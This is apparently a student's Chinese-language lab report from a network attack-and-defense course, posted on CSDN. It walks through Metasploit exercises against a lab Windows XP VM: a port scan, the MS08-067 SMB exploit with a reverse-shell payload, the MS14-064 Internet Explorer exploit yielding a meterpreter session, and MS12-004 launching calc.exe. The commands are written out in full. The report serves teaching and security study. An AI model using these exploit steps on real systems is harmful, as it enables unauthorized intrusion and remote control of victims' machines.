20202409 2022-2023-2 《网络与系统攻防技术》实验六实验报告

已于 2023-05-23 14:31:21 修改
阅读量228 收藏 3
点赞数
分类专栏: 网络攻防实验 文章标签: 网络 数据库
于 2023-05-22 22:21:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53980546/article/details/130727414
版权

20202409 2022-2023-2 《网络与系统攻防技术》实验六实验报告

1.实验内容

本周实验内容主要是学习metasploit的使用方法,并完成一些实践任务。重点有以下三种常用的攻击方式和思路:

1.1一个主动攻击实践,尽量使用最新的类似漏洞;
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

要求须成功应用任意一个辅助模块。

2.实验过程

2.1主动攻击

本次实践通过检测网络服务漏洞来实施主动攻击。我们利用metasploit辅助模块检测靶机开放的端口来搜寻可能存在的漏洞,然后利用它的攻击模块进行攻击测试。

1.在kali虚拟机上ping目标靶机,可ping通:
在这里插入图片描述

2.使用msf辅助模块portscan来探测靶机的开放端口:

//开启metasploit交互终端
service postgresql start
msfdb init//已初始化过的可以运行命令msfdb run,效果等同于msfdb start + msfconsole
msfconsole
//搜索辅助模块portscan,选择对tcp端口进行扫描的模块
search portscan
use 5

在这里插入图片描述*2.设置需要的参数,主要是靶机IP,可以多设些线程,提高运行速度,开启扫描,发现xp靶机开放了tcp135、139和445端口:

set RHOST 192.168.197.136
set THREADS 10
show options
run

在这里插入图片描述

3.注意到445端口开放,可利用ms08-067漏洞模块进行攻击,可用以下命令检测主机是否可被攻破。结果显示vulnerable,我们开始着手使用该模块作渗透测试。

nmap -p 445 192.168.197.136 --script=smb-vuln-ms08-067

在这里插入图片描述4.进入metasploit交互终端,搜索ms08-067模块,并运用该模块。

search ms08-067
//搜索到一个结果,其编号为0
use 0

在这里插入图片描述5.设置payload为generic/shell_reverse_tcp,和RHOST为靶机ip,并检查设置。

set payload generic/shell_reverse_tcp
set RHOST 192.168.197.136
show options

在这里插入图片描述

6.启动渗透,可以成功获得xp靶机的shell(对老版windows命令不太熟悉,试错了好多):

run //或者exploit

在这里插入图片描述

2.2针对浏览器的攻击

在metasploit中搜索browser相关的模块,选取rank高的进行渗透测试,多次尝试均失败,ie浏览器会在渗透过程中关闭进程,原因不明。参考了学姐的博客,我改用ms14_064_ole_code_execution进行渗透测试,第一次失败,紧接着第二次换了一个端口竟然成功了,unbelievable!

1.转到ms14_064_ole_code_execution模块,填写相关参数:SRVHOST、LHOST、LPORT、AllpwPowerShellPrompt,检查相关参数设置。

use exploit/windows/browser/ms14_064_ole_code_execution
set SRVHOST 192.168.197.130
set AllowPowerShellPrompt true
set LHOST 192.168.197.130
set LPORT 9024
show options

在这里插入图片描述2.启动测试,获得一段用于攻击的网址,用靶机的IE浏览器访问它。

exploit

在这里插入图片描述

在这里插入图片描述

2.等待一段时间后,会话新建成功,选择进入一个会话,成功获取靶机shell。

exploit
//meterpreter成功新建一个会话
sessions//列出所有会话
session -i 1//转到第一个会话,成功获取shell,可以执行相关命令

在这里插入图片描述

2.3针对客户端的攻击(ms_12_004)

本次实践针对xp系统的windows media player所带有的漏洞,利用metasploit的ms_12_004_midi模块对靶机进行渗透测试,我们可以获取系统权限,弹出运行计算机程序。

1.搜索并进入相应的模块,设置参数如下:

set payload windows/exec
set cmd calc.exe
set URIPATH auto
show options

在这里插入图片描述2.exploit运行,复制网址,粘贴入靶机IE浏览器搜索栏搜索。结果:xp靶机弹出计算机程序。
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

3.问题及解决方案

问题1:中文版xp系统永恒之蓝漏洞复现无法完成
问题1解决方案:重装原版(英文版)的xp系统
问题2:exploit后出现address already in use
问题2解决方案:问题的出现伴随着所种可能性:1.参数配置有问题,需要理解参数的具体含义,避免配置错误;2.kali主机的监听端口被占用,有两种选择:杀死占用端口的进程,或者更换监听端口。

4.学习感悟、思考等

本次实验也花了很多时间去完成,依然拖到了实验课的下一周才彻底结束,过程中不是很顺利,碰到了各种各样的问题。但是,碰到问题实在太正常了,顺利也不是能够苛求的,终归也从中学到了不少知识,还磨炼了自己应对困难的心态。本次实验主要是基于metasploit,操作起来毫无难度,理解原理才应该是重头戏。可是,我感觉自己尚未有严肃研究某个漏洞的基础,在metasploit渗透框架下,我就如孩童一样只是在“玩”这些漏洞而已,希望能够趁热打铁,努力提高自己的水平,作为一个网络空间安全专业的学生,这是难以推脱的使命。

参考资料
1.Metasploit渗透测试基础
2. Metasploit主动攻击
3. 针对浏览器的攻击
4. 针对客户端的攻击

鲁雨云
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf 渗透测试-认识Metesploit2.pdf 渗透测试1.pdf
metasploit自动化渗透攻击模块
11-18
metasploit自动化渗透攻击模块db_autopwn
MetaSploit渗透攻击平台
04-20
bt5下的。MetaSploit渗透攻击平台。
实验六 网络协议攻击——TCP攻击
qq_52192927的博客
05-14 681
网络攻防
20202402 2021-2022-2 《网络系统攻防技术实验六实验报告
weixin_51387301的博客
05-17 151
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:1.1一个主动攻击实践,尽量使用最新的类似漏洞;1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;1.4 成功应用任何一个辅助模块。以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。
20202414 2022-2023-2 《网络系统攻防技术实验六实验报告
h118189的博客
05-16 894
本次实验学习目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。我进行了以下实践,对msf进行攻击有了更深的理解:1.1 一个主动攻击实践,使用使用漏洞为永恒之蓝(MS17_010);1.2 一个针对浏览器的攻击,使用漏洞为极光漏洞(MS10_002);1.3 一个针对客户端的攻击,实施了针对Adobe的漏洞的攻击;1.4 成功应用任何一个辅助模块。
20202418 2022-2023-2 《网络系统攻防技术实验六实验报告
Fish_eggs的博客
05-16 370
SMB(ServerMessageBlock)协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台。但是,SMB协议中采用控制文件安全传输的机制是使用客户身份验证的方式,通过客户端向服务器端发送验证密码来获取文件传输的权限。针对该机制的网络攻击相对严重,攻击程序通过对验证密码的截获来窃取文件的访问权限,局域网下文件传输的安全性得不到保障。使用Metasploit渗透框架可以进行SMB服务版本扫描。
天网防火墙的配置
qq_45157635的博客
06-19 1287
随着计算机技术的迅速发展,在计算机上处理的业务也由基于单机的数学运算、文件处理,基于简单连接的内部网络的内部业务处理、办公自动化等发展到基于复杂的内部网、企业外部网、全球互联网的企业级计算机处理系统和世界范围内的信息共享和业务处理。在系统处理能力提高的同时,系统的连接能力也在不断的提高。但在连接能力信息、流通能力提高的同时,基于网络连接的安全问题也日益突出,因此计算机安全问题,应该像每家每户的防火防盗问题一样,做到防范于未然。防火墙则是一个安全策略的检查站。所有进出的信息都必须通过防火墙,防火墙便成为安全问
Metasploit学习总结
马赛克的博客
04-04 588
一:前言 Metasploit是一个漏洞利用框架,我们可以获取,使用,开发,共享漏洞攻击程序,(可以根据自己的需要开发漏洞攻击程序)。 并且提供了大量的攻击载荷供我们选择,所谓的攻击载荷就是再目标计算机上实现"额外的功能",就像是回答的问题:“我已经控制了机器,还要做什么”,一般来说,最受欢迎的攻击载荷包括添加用户,开启后门,以及在目标机安装新软件。 二:使用 原则:把Metasploit...
网络攻击与防御》网络数据分析实验(5)
CSDNfengwang的博客
02-21 303
理解TCP/IP协议各层的主要作用,掌握利用Wireshark获取数据包的方法,可以使用Wireshark从数据包中获取到有用的信息并找出主机被进行过网络扫描的证据以及对方的IP地址、MAC地址和扫描的方式。nmap -sP IP地址-----使用nmap -sn -PE IP地址也可以。ACK扫描方式:nmap -sA IP地址(使用TCP的ACK进行扫描)TCP扫描方式:nmap -sT IP地址 -p 端口范围。SYN扫描方式:nmap -sS IP地址。-P 1-65535:扫描全端口。
SXU-网络攻防2022-2023学年第一学期期末考试题
12-28
山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学...
西南科技大学网络攻防与对抗实验三,ARP欺骗实验
06-02
实验三,ARP欺骗详细过程实验报告 验证型实验,了解ARP欺骗的原理,掌握ARP欺骗的实验过程 (1)准备实验环境 (2)在虚拟机上运行cain主程序 (3)扫描活动主机 (4)配置信息 (5)开启ARP欺骗实验过程 (6)观察...
网络安全-网络攻防技术-实验报告-北京航空航天大学
03-29
北京航空航天大学信息对抗技术专业本科生《网络攻防实验实验报告
天津理工大学信息安全专业网络攻防实验3-Web攻击与防御
11-28
1.实验目的1)通过该实验熟悉sqlmap常用的命令,完成POST注入...2.实验工具1)服务器:CentOS,IP地址:10.1.1.1362)测试者:win7,IP地址随机3.实验方案1)了解sqlmap以及post注入形成原因并利用sqlmap进行post注入
SXU-2022-2023第一学期网络攻防期末考试答案(个人版,99.8分).pdf
12-31
山西大学2022-2023第一学期网络攻防期末考试答案 此答案为本人考试时亲自实操完成,99.8分
网络靶场攻防综合实验
weixin_46605806的博客
12-20 5764
目录一,靶场环境搭建1.1,网络拓扑结构图1.2,搭建简易的网络攻防实验靶场环境,包括:1.3,网络靶场攻击渗透测试,包括:1.4,网络靶场攻击检测二,靶场的搭建与攻击渗透测试2.1,Honeyd2.1.1,honeyd概述2.1.2,honeyd所依赖的函数库2.1.3,搭建honeyd2.1.4,编写honeyd的配置文件2.1.5,启动honeyd2.1.6,检查honeyd搭建情况2.2,具有“永恒之黑”CVE-2020-0796漏洞的虚拟主机2.2.1,漏洞概述2.2.2,复现环境2.2.3,漏洞
网络安全实战:记一次比较完整的靶机渗透
Candour_0的博客
01-18 351
网络安全实战:记一次比较完整的靶机渗透
20202422 2022-2023-2 《网络系统攻防技术实验实验报告
cdssywgyxx的博客
05-07 387
通过结果可以知道开放的端口,135,139,445,49664,49665,49666,49667,49682,49686。问题1解决方案:我猜想,其中一个ip是起到中转、路由的作用,不好判断哪个是真正的终端的ip。对比前几次实验,没有很多复杂烧脑的操作,但是却可以以实操的方式带领我熟悉信息搜集技术的相关知识,我个人很喜欢这种实验的方式,希望以后多给一些这种类型的任务。(注意,下图的情况是第一次进入还在安装插件,右上角的转圈代表的就是正在安装相关的插件,需要等十分钟左右,此时是不可以进行配置和创建扫描的)
20202410 2022-2023-2 《网络系统攻防技术实验六实验报告
weixin_65026438的博客
06-02 183
这次遇到的问题主要出现在一开始的环境配置上,中文版的winXP始终无法扫描出可攻击漏洞,幸运的是,姜和言同学遇到过这类问题并指出是版本问题,而且提供了英文版的winXP镜像,所以很快便能够解决了,之后攻击Adobe的时候也是她提供了可用版本的Adobe,所以这次实验还是很顺畅的。ms10_002漏洞,它是IE浏览器漏洞,也称“极光漏洞”,可以通过该漏洞获取目标主机的控制权。一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;一个针对浏览器的攻击,尽量使用最新的类似漏洞;
Spanning-tree 攻防实验 发起攻击后,PC1的网络中断
最新发布
07-08
在Spanning Tree攻防实验中,如果你发起了攻击并导致PC1的网络中断,可能有以下几个可能的原因: 1. 攻击导致环路:如果你在网络中引入了一个环路,例如在不同的交换机之间创建了多个连接,Spanning Tree Protocol...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值